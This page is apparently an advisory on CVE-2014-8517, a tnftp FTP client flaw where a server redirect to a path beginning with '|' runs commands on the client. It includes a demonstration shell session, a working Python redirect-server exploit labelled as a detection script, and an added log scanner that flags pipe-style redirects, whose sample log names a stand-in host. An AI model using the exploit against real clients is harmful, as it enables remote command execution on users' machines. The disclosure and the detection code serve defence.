
Vulnerability alert: serious remote command execution flaw in FTP affects multiple Unix versions (with detection

On October 28, a public mailing-list message disclosed a remote command execution vulnerability in the FTP client. Affected Unix systems include Fedora, Debian, NetBSD, FreeBSD and OpenBSD, and even the latest release of Apple's OS X, Yosemite 10.10.

A NetBSD developer (Jared McNeill) confirmed that the vulnerability lets a web server remotely execute malicious commands through tnftp; it has been assigned CVE-2014-8517:

  a20$ pwd
  /var/www/cgi-bin
  a20$ ls -l
  total 4
  -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
  -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
  a20$ cat redirect
  #!/bin/sh
  echo 'Status: 302 Found'
  echo 'Content-Type: text/html'
  echo 'Connection: keep-alive'
  echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
  echo
  a20$
  a20$ ftp http://localhost/cgi-bin/redirect
  Trying ::1:80 …
  ftp: Can't connect to `::1:80': Connection refused
  Trying 127.0.0.1:80 …
  Requesting http://localhost/cgi-bin/redirect
  Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
  Requesting http://192.168.2.19/cgi-bin/|uname%20-a
  32      101.46 KiB/s
  32 bytes retrieved in 00:00 (78.51 KiB/s)
  NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36 ADT 2014  Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIEBOARD evbarm
  a20$

  Affected systems and advisories

  Debian, Red Hat, Gentoo, Novell (SuSE Linux), DragonFly, FreeBSD, OpenBSD and Apple are aware of the severity of this vulnerability; of these, Debian, Red Hat, Gentoo and Novell have already published advisories:

  Vulnerability detection script (do not use for illegal purposes)

  #!/usr/bin/env python
  """
  Sample OSX/BSD FTP client exploit. Written because ISO policies were doing
  my head in. To exploit, edit the value of the cmd variable, then run the
  script. To test:

  ftp http://<myserver>/foo

  And you should see the command executed.

  All wrongs reversed - @stevelord
  """
  import BaseHTTPServer
  import sys
  import socket
  import urllib

  hostname = socket.getfqdn()  # Set this to your IP if you have no FQDN
  port = 8000  # Set this to the port you want to run this on
  cmd = "uname -a; echo You probably shouldnt execute random code from the Internet. Just saying."
  cmd = urllib.quote(cmd)
  # The redirect target's last path component is what the client uses as its output
  # file name; the leading '|' is what the vulnerable client interprets as a pipe.
  redir = "http://" + hostname + ":" + str(port) + "/cgi-bin/|" + cmd

  class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):
      def do_GET(s):
          if cmd in s.path:
              # Second request: the client has followed the redirect, answer with an empty 200
              s.send_response(200)
              s.end_headers()
          else:
              # First request (any other path): send the 302 pointing at the '|cmd' path
              s.send_response(302)
              s.send_header("Location", redir)
              s.end_headers()

  if __name__ == "__main__":
      print "redirecting to,", redir
      server_class = BaseHTTPServer.HTTPServer
      httpd = server_class((hostname, port), RedirectHandler)
      # serve_forever() blocks until interrupted, so announce before calling it
      print "Started serving."
      try:
          httpd.serve_forever()
      except KeyboardInterrupt:
          pass
      httpd.server_close()
      print "\nStopped serving."
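The session above and the proof-of-concept script both rely on the same detail: tnftp derives the local output file name from the last path component of the URL it ends up fetching, and a name beginning with `|` is treated as a command to pipe the download into, so a 302 whose Location ends in `/|command` turns a fetch into command execution. The following Python 3 scanner is an added example for this page (it is not the original script by @stevelord and not tnftp code); it extracts Location values from constructed proxy log lines and flags redirect targets whose decoded output name starts with `|`, which is the pattern a defender would watch for in web or proxy logs. The log format and the `location=` field are assumptions made for the sample.

```python
"""Flag HTTP redirect targets that a vulnerable tnftp would treat as a shell pipe.

Added example, not part of the original page's PoC or of tnftp itself.
The log line format below is constructed for this demonstration.
"""
import re
from urllib.parse import unquote, urlsplit


def output_name(url: str) -> str:
    """Return the decoded last path component, i.e. the file name tnftp
    would use when saving the download (CVE-2014-8517 hinges on it)."""
    path = urlsplit(url).path
    last = path.rsplit("/", 1)[-1]
    return unquote(last)


def is_pipe_redirect(url: str) -> bool:
    """True if the URL's output name begins with '|', which the vulnerable
    client interprets as 'pipe the fetched data into this command'."""
    return output_name(url).startswith("|")


# Constructed sample proxy log: one 'location=' field per line ('-' when absent).
SAMPLE_LOG = """\
2014-10-28T10:00:01Z client=10.0.0.5 status=302 location=http://mirror.example/pub/file.tgz
2014-10-28T10:00:02Z client=10.0.0.5 status=302 location=http://192.168.2.19/cgi-bin/|uname%20-a
2014-10-28T10:00:03Z client=10.0.0.7 status=200 location=-
2014-10-28T10:00:04Z client=10.0.0.9 status=302 location=http://evil.example/dl/%7Cid
"""

LOCATION_RE = re.compile(r"location=(\S+)")


def scan_log(text: str) -> list:
    """Return (line_number, url) for every redirect target that would be piped.
    Percent-encoded pipes (%7C) are caught because output_name() decodes first."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOCATION_RE.search(line)
        if m and m.group(1) != "-" and is_pipe_redirect(m.group(1)):
            hits.append((n, m.group(1)))
    return hits


if __name__ == "__main__":
    for n, url in scan_log(SAMPLE_LOG):
        print("line %d: pipe-style output name %r in %s" % (n, output_name(url), url))
```

The check decodes before testing the prefix, so `%7C` is caught as well as a literal `|`; the same `output_name()` test is what a patched client needs to apply to any name it derives from a redirect before opening the output, which is the shape of the fix for this class of bug.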
